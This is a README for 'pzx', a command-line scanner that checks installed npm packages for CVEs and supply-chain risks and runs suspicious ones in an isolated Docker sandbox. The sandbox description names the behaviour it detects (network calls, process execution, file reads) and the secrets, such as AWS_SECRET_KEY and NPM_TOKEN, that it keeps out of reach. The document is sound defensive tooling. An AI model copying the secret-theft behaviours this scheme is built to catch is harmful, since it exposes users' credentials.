Scans your filesystem, resolves real installed versions, checks OSV for CVEs, runs supply chain heuristics, performs AST analysis with Bun.Transpiler, and detonates suspicious packages in a sandboxed environment. Zero dependencies.

bunx @georgegiosue/pzx lodash

bunx @georgegiosue/pzx [package] [version] [--root <path>] [--home] [--lang <lang>] [--run <file>] [--help]

bunx @georgegiosue/pzx                              # scan ALL installed packages
bunx @georgegiosue/pzx lodash 4.17.20               # check specific package
bunx @georgegiosue/pzx express --home               # scan from home directory
bunx @georgegiosue/pzx @babel/core -r ~/projects    # scan specific path
bunx @georgegiosue/pzx lodash --lang es             # output in Spanish
bunx @georgegiosue/pzx --run suspicious.js          # detonate a JS file directly

Without arguments, pzx enters full scan mode: discovers every installed package, runs static analysis locally, and only queries external APIs for packages flagged as suspicious.

Packages flagged by static analysis are executed in an isolated Docker container:

• Docker isolation — --network=none, --read-only, --memory=128m, --cpus=0.5
• Mock environment intercepts fetch, fs, child_process, http/https inside the container
• Empty env — no AWS_SECRET_KEY, no NPM_TOKEN, nothing to steal
• 5000ms timeout — kills the container if it blocks (C2 wait, infinite loop)
• Violations are classified: NETWORK, EXEC, FS_READ
• Docker is required for sandbox execution — no fallback to host execution

0 no vulnerabilities | 1 error | 2 vulnerabilities found

MIT

Most (if not all) of this was built by AI xd